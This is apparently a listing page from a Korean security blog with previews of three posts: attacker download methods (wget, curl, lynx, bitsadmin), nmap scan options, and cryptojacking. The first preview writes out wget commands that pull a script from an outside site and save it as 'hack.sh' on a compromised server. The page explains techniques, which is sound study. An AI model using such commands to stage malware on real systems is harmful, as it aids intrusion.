SYSTEM/TIP

악성코드 파일 다운로드 명령어 / wget / curl / lynx / bitsadmin

해커가 보안 취약점을 이용하여 시스템 장악후 외부 사이트로 부터 어떤 방법을 이용하여 악성코드를 다운로드 할까요? 가장 보편적인 방법으로는 OS 자체 명령어를 사용 하여 악성코드를 다운로드 합니다. 전제 조건 보안 취약점을 이용하여 시스템 장악 완료 OS (LINUX, Windows) 기본 명령어를 제어 할수 있는 권한 획득 피해 서버 아웃바운드(인터넷) 네트워크 통신 가능 상태 Linux OS wget 명령어 파일 다운로드 wget https://rootkey.tistory.com/code.sh wget https://rootkey.tistory.com/code.sh -P files/download -O hack.sh -P 디렉토리 저장 -O 파일명 지정 -b 백그라운드 실행 curl 명령어 파일 다운..

2022. 2. 14. 17:54

SYSTEM/TIP

nmap 사용법 옵션 팁

Nmap port scan Tip nmap 포트스캔 실행시 nmap 은 기본적으로 상위 1000개 포트를 스캔합니다. 예: nmap -sS -Pn 123.123.123.xx 상위 1000개 포트 스캔 포트 목록은 어떻게 정해 질까요? 리눅스 ubuntu 기준으로 설명을 하자면, /usr/share/nmap/nmap-services 파일이 핵심 nmap-services 파일은 사용 빈도(frequency)에 따른 포트/서비스 목록을 가지고 있음 상위 TOP 1000 개 사용 빈도가 높은 순으로 리스트를 볼려면 grep -v '^#' /usr/share/nmap/nmap-services | sort -rk3 | head -n1000 grep 은 주석(#으로 시작하는 줄)을 필터링 sort 명령은 세 번째 열..

2022. 2. 14. 15:31

SECURITY/해킹사고 사례

[해킹사고사례] 크립토재킹 cryptojacking

크립토 재킹 / cryptojacking 이란? 크립토재킹(Cryptojacking)은 피해자의 PC 및 모바일 기기 감염을 통해 암호화폐를 채굴 하기 위한 공격 가장 많이 알려진 악성코드로는 암호화폐 모네로 채굴에 사용되는 악성코드 암호화폐 채굴 악성코드에 감염되면 감염 서버나 PC의 CPU 자원을 99% 까지 사용 비정상적인 루트나 불법으로 채굴코드를 설치하여 감염 device의 리소스 자원을 사용하여 해커는 불법으로 이득을 취할수 있으며, 피해자 입장에서는 과다한 리소스 사용으로 예를들자면 전기 요금이 상승하여 금전적인 피해가 발생할수 있으며, 서비스 운영적인 측면에서도 속도가 느려진다 거나 이외 다양한 불이익이 발생할수 있다. 요즘은 고도화 되어 CPU 사용량 많으로는 감염 사실을 알아차리기 힘듬..

2022. 2. 14. 13:21